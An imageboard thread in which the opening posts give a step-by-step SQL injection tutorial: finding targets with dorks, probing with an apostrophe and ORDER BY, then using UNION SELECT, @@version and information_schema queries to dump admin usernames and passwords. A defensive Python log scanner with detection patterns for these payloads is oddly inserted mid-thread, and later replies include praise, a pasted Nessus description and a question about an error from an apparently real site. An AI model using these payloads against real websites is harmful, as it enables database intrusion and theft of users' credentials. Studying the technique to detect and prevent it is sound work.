/hf/ - Hack Funk

L33T's, Skids, and Leaks.

A growing family of Skids and L33TS

File: 1422266003394.jpg (41.7 KB, 404x256, 101:64, sqli.jpg)

 No.40

SQL injection is a code injection technique, in which malicious SQL statements are inserted into an entry field for execution.
What you'll need -

*A list of dorks, I got these for you:
http://www.mediafire.com/download/lzy8cjo52xct1m4/Dorks.txt

*A functioning brain (50% of you can stop reading here)

We'll be covering manual and blind SQLi injection, no Havij.


Step №1 - Check for vulnerability
You can either use a vulnerability scanner or manually check websites; it's up to you.

Using the list of dorks, find a website; let's say we found www.halfchan.org/news.php?id=4
We add an apostrophe to the end of the URL and hope it relays a SQL error back to us.

www.halfchan.org/news.php?id=4
becomes
www.halfchan.org/news.php?id=4'
An indication of a vulnerable website is a message along the lines of:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server"

Great, halfchan is vulnerable and ready to be injected.

Step №2 - Find number of columns
Finding the number of columns is usually achieved by declaring the ORDER BY statement; we keep incrementing in constant steps until we get a relayed error.

www.halfchan.org/news.php?id=4 order by 1/* <– no error
www.halfchan.org/news.php?id=4 order by 2/* <– no error
www.halfchan.org/news.php?id=4 order by 3/* <– no error
www.halfchan.org/news.php?id=4 order by 4/* <– error (we get a relayed message along the lines of Unknown column '4' in 'order clause')
We do not count the last table because it does not exist, so we have 3 columns.

Step №3 - Discover UNION
We declare a UNION statement at the end of the URL to find out which tables are vulnerable:
www.halfchan.org/news.php?id=4 union all select 1,2,3/*

Step №4 - Extract SQL Version
Our UNION command told us that table 2 is vulnerable, so we will use that table to extract the version. It's important to understand that SQLi only works on MySQL versions below 5.

Replace the vulnerable number table with @@version. Our vulnerable table is two, so we remove the 2 from the URL and insert @@version in order to relay the MySQL version back to us:

www.halfchan.org/news.php?id=4 union all select 1,@@version,3/*

In case the server does not relay the MySQL version back to you, we declare the convert() function in order to bypass the error, in case it's caused by unicode issues.

www.halfchan.org/news.php?id=4 union all select 1,convert(@@version using latin1),3/*
If the server still refuses to relay the version, which probably means the charset is not set to default, we can try bypassing it with this additional syntax:

www.halfchan.org/news.php?id=4 union all select 1,unhex(hex(@@version)),3/*

At last, we have our version, it's below 5 and we can carry on.

Step №5 - Obtaining tables and columns names manually
This is a straining and boring step, which is why I recommend getting Havij to do it for you, however, the basics are important.

Common table names: user(s), admin(s), member(s) - these also happen to be the tables we will need to get some tasty information.

Common column names: username, user, usr, user_name, password, pass, passwd, pwd

Attempting to relay one of the tables is simple, and will look like this
www.halfchan.org/news.php?id=4 union all select 1,2,3 from admin/*

If the table exists, relaying a column is also simple, and will look like this
www.halfchan.org/news.php?id=4 union all select 1,username,3 from admin/*

This is a guessing game, so either start guessing or use Havij to guess for you.

By some miracle, we got admins table and username column right, and all the usernames are displayed:
Noot
Janitor
Janitor2
Janitor3
User
User
User
User
User

Great, now we know the halfchan's administrator username, Noot.

Getting the password depends on how the database is set up; sometimes they're unencrypted and in plain text, and sometimes they're md5 hashed, I've seen it all.

By now you should know how to maneuver around tables and columns, so we head over to the passwords column

www.halfchan.org/news.php?id=4 union all select 1,password,3 from admin/*

This usually relays a large, confusing wall of text; it can be re-arranged to look all pretty and nice using the concat statement.

www.halfchan.org/news.php?id=4 union all select 1,concat(username,0x3a,password),3 from admin/* (0x3a is a hash value for colon (:) which will separate our usernames and passwords from the admin table.)
Noot:ILoveBigCocks
Janitor:123456
Janitor2:password
Janitor3:8chanisbetter
User:41241251
And so forth.

If your keyboard has no : because you're Finnish or something, you can use ASCII as well.
www.halfchan.org/news.php?id=4 union all select 1,concat(username,char(58),password),3 from admin/*

A last resort if you cannot guess tables or columns would be using mysql.user as default.


part 2 next reply
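From the defender's side, the probing sequence described above (the apostrophe, the ORDER BY increments, UNION SELECT with @@version, concat with 0x3a) leaves a very recognisable trail in web server access logs. This is an added example, not code from the original post: a small Python scanner that decodes each query-string value and matches it against rules built from the exact payload shapes in this thread, run over constructed sample log lines (the IPs, timestamps and requests are made up for the example).

```python
import re
from urllib.parse import urlparse, unquote_plus

# Constructed sample access-log lines (not from the original post): one probing
# session following the thread's steps, plus one benign request from another host.
SAMPLE_LOG = """\
203.0.113.9 - - [27/Jan/2015:10:00:01 +0000] "GET /news.php?id=4 HTTP/1.1" 200 5120
203.0.113.9 - - [27/Jan/2015:10:00:05 +0000] "GET /news.php?id=4' HTTP/1.1" 500 312
203.0.113.9 - - [27/Jan/2015:10:00:09 +0000] "GET /news.php?id=4%20order%20by%203/* HTTP/1.1" 200 5120
203.0.113.9 - - [27/Jan/2015:10:00:14 +0000] "GET /news.php?id=4%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 5130
203.0.113.9 - - [27/Jan/2015:10:00:20 +0000] "GET /news.php?id=4%20union%20all%20select%201,concat(username,0x3a,password),3%20from%20admin/* HTTP/1.1" 200 7000
198.51.100.4 - - [27/Jan/2015:10:01:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4900
"""

# Common Log Format: client IP, identity, user, [timestamp], "METHOD target proto", status, size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Each rule is (name, regex) applied to the percent-decoded value of every query parameter.
RULES = [
    ("quote_probe", re.compile(r"^\d+'\s*$")),                       # id=4'
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),     # order by N/*
    ("union_select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("version_fingerprint", re.compile(r"@@version|version\(\)", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("concat_0x3a", re.compile(r"\bconcat\s*\(.*0x3a|char\s*\(\s*58\s*\)", re.I)),
]

def scan_line(line):
    """Return (ip, path, [matched rule names]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    hits = []
    # Decode each raw key=value pair ourselves; parse_qs would silently drop odd values.
    for pair in url.query.split("&"):
        value = unquote_plus(pair.partition("=")[2])
        for name, rx in RULES:
            if rx.search(value) and name not in hits:
                hits.append(name)
    return m.group("ip"), url.path, hits

def scan_log(text):
    """Group suspicious requests by source IP: {ip: [(path, hits), ...]}."""
    findings = {}
    for line in text.splitlines():
        parsed = scan_line(line)
        if parsed and parsed[2]:
            findings.setdefault(parsed[0], []).append((parsed[1], parsed[2]))
    return findings
```

Several rules firing from one IP within a short window, in the order the thread describes, is a much stronger signal than any single match, so alert on the aggregate per source rather than per line.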

 No.41

If the MySQL version is above 5, we have a different approach to injecting.
If you're familiar with MySQL you know all tables and columns are held by information_schema.
In order to get our tables now, we use table_name and information_schema.tables statements.

We keep using the union statement, and we use our previous vulnerable table as our key once again, making a table_name request and pinpointing the information_schema.tables route.
/* is a popular commenting method in many languages, and MySQL shares this; it allows us to bypass pesky warnings and errors.

www.halfchan.org/news.php?id=4 union all select 1,table_name,3 from information_schema.tables/*
This will not display the information we want properly because we didn't limit it, so we add the limit statement.

www.halfchan.org/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note the 0,1 = getting 1 result starting from the 0th line.
Change this accordingly to display the information you want.

www.halfchan.org/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 1,1/* - Second table is displayed, the third table is 2,1, and so forth.

Keep incrementing those values until we find useful tables: db_admin, poll_user, auth, auth_user, etc.

Getting the column names is exactly the same.
www.halfchan.org/news.php?id=4 union all select 1,column_name,3 from information_schema.columns limit 0,1/* - the only change is the statement we declare. Keep incrementing those values until we find useful columns: username, user, login, password, pass, passwd, apass, etc.

If you need to display a specific table you can use a simple query.
www.halfchan.org/news.php?id=4 union all select 1,column_name,3 from information_schema.columns where table_name='users'/* - this will display the column "name" in the table "users"; using a simple LIMIT we can display all information needed.

This will NOT work if Magic Quotes are enabled on MySQL.

We get all the information in a giant wall of text, or a disorganized list; we use the previous concat() function to make it all pretty and nice, again.

www.halfchan.org/news.php?id=4 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
Using ASCII works here too, instead of 0x3a; this will group up the information from the table 'users'.
Usually looks like this:
noot:hash:noot@halfchan.org

Blind SQL Injection - A more complicated approach to a complicated issue, I will write this soon.

 No.87

>>41
>>40
Awesome post op

 No.98

>A functioning brain (50% of you can stop reading here)

Epic, simply epic.


 No.103

epin


 No.116

Interesting stuff.


 No.144

LOL Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $2,190 per year, which still beats many of its competitors. A free “Nessus Home” version is also available, though it is limited and only licensed for home network use.

Nessus is constantly updated, with more than 70,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a web-based interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. Read 16 reviews.

Latest release: version 6.3.3 on March 16, 2015 (12 months ago).


 No.145

Would this be the error in step2 - the 'order by'?

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home1/zeoworks/public_html/game.php on line 21



